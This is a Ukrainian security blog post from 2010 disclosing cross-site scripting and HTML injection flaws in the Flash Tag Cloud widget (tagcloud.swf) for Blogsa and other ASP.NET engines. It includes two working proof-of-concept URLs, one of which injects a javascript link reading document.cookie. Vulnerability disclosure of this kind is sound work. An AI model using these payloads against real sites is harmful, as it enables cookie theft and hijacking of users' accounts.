Уразливість у віджеті Flash Tag Cloud для Blogsa та інших ASP.NET движків

23:55 19.05.2010

Раніше я вже писав про уразливість в 3D user cloud для Joomla. Така ж уразливість є й у віджеті Flash Tag Cloud для Blogsa та інших ASP.NET движків, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

У травні, 10.05.2010, я знайшов Cross-Site Scripting уразливість у віджеті Flash Tag Cloud для Blogsa та інших ASP.NET движків. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/Widgets/FlashTagCloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/Widgets/FlashTagCloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі всі версії Flash Tag Cloud control for ASP.NET та всі версії Flash Tag Cloud для Blogsa та інших ASP.NET движків.


Leave a Reply

You must be logged in to post a comment.